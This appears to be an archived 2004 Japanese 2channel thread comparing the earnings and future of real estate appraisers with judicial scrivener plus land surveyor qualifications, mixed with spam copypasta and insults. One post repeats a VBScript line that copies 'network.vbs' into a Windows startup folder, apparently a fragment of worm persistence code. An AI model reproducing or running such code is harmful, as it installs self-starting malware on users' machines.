5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

[不動産鑑定士一本]vs[司法書士+調査士]

1 :名無し検定1級さん:04/05/27 19:33
どっちが儲かるのかな?
どっちが将来性あるのかな?
どっちがゼロ勉から最終的にゲットしやすいのかな?

2 :名無し検定1級さん:04/05/27 19:36
>>1
取っても多分開業できないからそんな心配はいらない

3 :名無し検定1級さん:04/05/28 10:38
ミエの結婚相手に望むことわ
1、かっこいいこと 
  これわぜったい。だって毎日顔合わせる人が不細工だったらいやだもんね!
  このみわジャニ系、身長も175わほしいかな?ハーフだったらいうことなし。
  外人ちょー好き。特にイタリア人。デルピエロちょーーーーーーーーかっこいいよね?
2、浮気わぜったいにダメ!でもミエの浮気わ1年に1回だけだったら許してくれる
  心の広い人。
3、タバコ、お酒をいっしょにやってくれるひと
 (じつわもうすでに愛煙家だったりするので テヘへ(^p^)
4、年収わ1000万いじょー お金の管理わミエがやることにしてマイホームにわ
  ぜったいに住みたい!あとミエのたんじょーびにわミエの大好きなブランド品
  をかってくれたらうれしいな
5、ミエわHがそんなに好きじゃないのであんまりHなひととわちょっと・・・
  1ヶ月に2,3回してくれればイイや。あっ、でもこどもわ2人ぐらいほしいな、
  できればおんなのこ。名前わ「マリヤ」ちゃん。そんでもってマリヤちゃん
  の髪の毛を金髪に染めてあげておしゃれさせてあげるんだあ。
  あとカラオケにもマリヤちゃんといっしょにいってハマアユのうたとか
  歌いたいなあ。
6、ミエわ高校いってないから一流の大学でてるひとで英会話とか教えてくれる人。
  これからの時代、グローバル時代だもんね(笑
7、ミエわカラオケちょーだいすきっ娘(笑  なので歌がうまいひとがいいなあ
  ケミストリーの歌とかちょーうまくうたわれたらそれだけでもうメロっちゃう
8、ミエわブランドものがちょーーーーーー大好きなのでブランド品にうといひとわ
  うけつけらんないなー。やっぱおしゃれなひとじゃないと
9、ハゲといっしょに腕組んで歩くのわヤダからハゲたら別居しちゃうかも(笑
10、暴力、ギャンブルは即りこん。これは当然かな?
11、性格わ強くて、ミエをいっしょー守っていってくれるひと。もし、ミエが風を
   ひいたら、しごとを休んで一日中つきっきりで看病してくれるようなやさしいひと

4 :名無し検定1級さん:04/05/29 00:51
どっちもDQN資格だろ。
削除しとけや、ぼげ!

5 :名無し検定1級さん:04/05/29 03:40
当方建設業。最初に断っておくが年収1000万以上欲しいなら、どっちもダメ。
よほどコネや付き合いのある業者あるなら別だが。

どちらにも付き合いのある人、もしくは業者がいるがどっちが食えるかと言うと、
間違いなく司法書士と調査士だと思う。

鑑定士のほうは年々仕事が減っているし(特に公共部門)、まず鑑定士のほとんどが
個人経営。つまり人雇っているほど儲かっていないってこと。
あと鑑定士ってのは普通の一般客相手から依頼されることはほとんどない。
まず企業相手や国や地方自治体がほとんど。

で、この仕事自体今ではほとんど一部の年寄りの鑑定士が握っていて一般の鑑定士では
受けることが出来ない。

もし自分が20代で将来をこの2つのどちらしかないと考えるなら調査士&書士を選ぶ。




6 :名無し検定1級さん:04/05/29 04:07
当方、書士のみの開業だが独立するなら司法書士+調査士
の方がベターだろう。書士のみでしかも業者からの仕事皆無
でも税理士、銀行からの依頼で年収750万は行く。しかも他士
業の参入の一番少ない調査士セットだったらかなり手堅い。
ただ、試験の難易度は司法書士>>鑑定士>調査士なので
手軽に取って信託銀行あたりでサラリーマンやるなら鑑定士
かな。試験の難易度と企業の需要は別で、企業内評価では鑑
定士の方が重宝されるのも事実だからね。
あとは自分のライフスタイルに合わせてどうぞ。

7 :名無し検定1級さん:04/05/29 06:50
>>1死ね

ローカルルール規約
第2条 新規スレを立てる前に『質問スレ』で質問すること
第3条 重複スレを立ててしまう前に『スレ一覧』で検索すること→Win[Ctrl+F],Mac[Command+F]

以後書き込み禁止

8 :名無し検定1級さん:04/05/29 09:17
>6
司法書士 鑑定士

両資格とも合格率約3%で、4、5年は必要な難関ですが、
受験者レベル、合格者学歴とも鑑定士の方が高いかと。


9 :名無し検定1級さん:04/05/29 09:26
鑑定士も司法書士ももう終焉まじかの
糞資格なんだけど・・・みんな世間知らずなんだねw

10 :名無し検定1級さん:04/05/29 09:36
>6
>受験者レベル、合格者学歴とも鑑定士の方が高いかと。

合格者の出身大学という意味では確かに鑑定士は有名大卒が多い(司法
書士もトップは早稲田だが)それが=受験者レベルの差につながるか
どうかはギモン。鑑定士2次は書士の5倍以上の16%の合格率。要は
1年程度で有名大卒が合格し、「補」の状態で3年かかるだけ。逆に書士
は有名大卒以外なら4〜5年はザラ。実質、受験者の試験に対する学力=
受験者レベルに差があるとしたらむしろ書士の方が上だと思う。

まぁ、企業の需要は鑑定士の方がありそうだってのは認めるけど。
ちなみに自分は早稲田卒の司法書士だが。

11 :名無し検定1級さん:04/05/29 09:54
結論から言って、弁護士・会計士・弁理士みな合格者大幅アップ。
あおりを受けて税理士・司法書士も仕事を喰えない弁護士・会計
士に荒らされる。いわゆる難関資格の将来、みな暗い。

12 :名無し検定1級さん:04/05/29 11:40
>>10
三次試験なめてんの?

13 :名無し検定1級さん:04/05/29 11:52
>>12
・・・合格率50%でしょ? 書士の口述よりはムズイだろうけど
まぁ鑑定士の仕事は調査士同様に弁護士などに荒らされないから
そこはメリットだよね

14 :名無し検定1級さん:04/05/29 12:01
http://www.shiho-shoshi.or.jp/discipline/d151217.pdf

1000円の印紙を砂消しで・・・・イタすぎる(藁

15 :名無し検定1級さん:04/05/29 12:09
>>13
去年は28.6%だよ
公認会計士とでも混同してるのか?

16 :名無し検定1級さん:04/05/29 12:11
8の釣りから荒れ出した。

17 :名無し検定1級さん:04/05/29 12:12
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"


18 :名無し検定1級さん:04/05/29 12:28
調査士も不況でちと苦しい

19 :名無し検定1級さん:04/05/29 12:35
≫10
2次も最終日カウントではないの?
13〜15%は、書士試験同様1日目で計算すれば10%ほど。
3次は、30%未満・・・・その間3年の研修などあり。
最速4年でも、3/100未満の確立ですかね。

20 :名無し検定1級さん:04/05/29 13:37
鑑定士より司法書士のほうがいいという奴は
きちがいかぼろ儲けしている鑑定士だろ

21 :名無し検定1級さん:04/05/29 15:11
                   ______
                 ...‐''゙   '゙ ''‐...           
               ..‐´         '゙ ''‐...  
             /::::::::            `‐..
            /:::::::::::              \     
           ./:::::::::::     ∧ ∧       ゙!,        
           /:::::::::::..      ・ ・        {    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
           |:::::::::::.        )●(        !  <  >>1 自作自演 乙!  
           |::::::::::::          ー         |    \__________
           .l:::::::::::::..                 /    
           ヽ::::::::::. ___            ,/     
             \::/`ー---‐^ヽ        /     
              l:::      l         /          
         _ /,--、l::::.      ノ       l        
     ,--、_ノ:: `ー'::   、ミー---‐,,l        \        
    ,/   :::         i ̄ ̄  |         \
   /:::::::.        l:::    l:::::::   l           \       
  l:::::::::::.   l:::    !::    |:::::::   l            \   
  |:::::::::l::::  l:::    |::    l:::::     l              l     
  |::::::::::l:::.   }:::   l:::::,r-----    l               l  
  ヽ::::::::l::::   ト:;;;;;;;/-/__...........  /                    
  /\::::`ー‐'  / l__l;;;;;;;;;;;/                   
/   `           /   




22 :名無し検定1級さん:04/05/30 03:12
>>18
俺は調査士している者だが、何気に去年の暮れ位から仕事増えてきてるよ
俺の周りの調査士も俺と同様に忙しくなってきていると言っているので
いよいよ本格的に不況脱出の兆しかもしれないと期待している

23 :名無し検定1級さん:04/05/30 16:11
>>14
ワラタ

24 :名無し検定1級さん:04/05/30 19:34
漏れは測量士と調査士(あと行書も)だが、
行書のほうはさっぱりだけど、
調査士はそんなに不況というほどでもないと思うがね。

俺は土地ばっかり(というより、土地だけ…)だからあんまり詳しくないが
知り合いの調査士、小規模ながら区分表示を受注したとか言ってたし、
建物の表示一筋の調査士だってそれなりに食えているみたいだし。

営業次第では食いっぱぐれることはないと思う、
ただ司法書士は大変らしいが。

25 :名無し検定1級さん:04/05/30 20:08
>24さん
何歳で独立したんですか?

漏れも調査士&行書とって独立考えてるんすけど。
人生の先輩としてアドバイスして頂けたらと思います。

26 :名無し検定1級さん:04/05/31 01:33
将来性でかんがえれば
鑑定士は書士よりはあると思われ
職域が広がろうとも
司法書士はいくら頑張っても常に弁護士さんという障壁が立ちはだかるね
今後は特に・・・
簡裁でくえる書士なんて今後一部っしょ
行書のほうが勢いあるし

でも鑑定士は確かに独占業務だけでくってくのは???だけど
その近隣・周辺業務で新しいビジネスモデルを構築できる範囲が広いと思う。
この資格全体の動きとしてが遅かっただけで鑑定周辺のニーズはある
というかまだまだ未知数
これからに期待ってとこだと思う


27 :名無し検定1級さん:04/05/31 14:00
>>25
両方取ってから来い

28 :名無し検定1級さん:04/06/01 00:28
>>25
本気で取得するならあまり今は現実的な話は聞かないほうがいいと思うぞ。
>>27の言う通り、まず資格を取ってから独立開業のアドバイスを聞けばと良いと思うぞ。
2chでありがちな(?)試験に受からずに現実だけ見て、諦めてしまいかねないし、
とりあえず、独立を考えているなら資格を取ることだけに専念したら?
ちなみに俺が知っている調査士や司法書士の受験生もよく同じ事を言ってるぞ。
(彼らは実務経験が無いものだから、肝心の試験勉強よりそっちを心配している。)

試験的なアドバイスなら多少できるが、実務や独立開業のアドバイスは
受かって実務を身に付けたときに考える事だと思う。
かなり現実的な話なので>>25にはまだ早いと思われ。

とりあえずがんがれ、話はそれからだ。

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)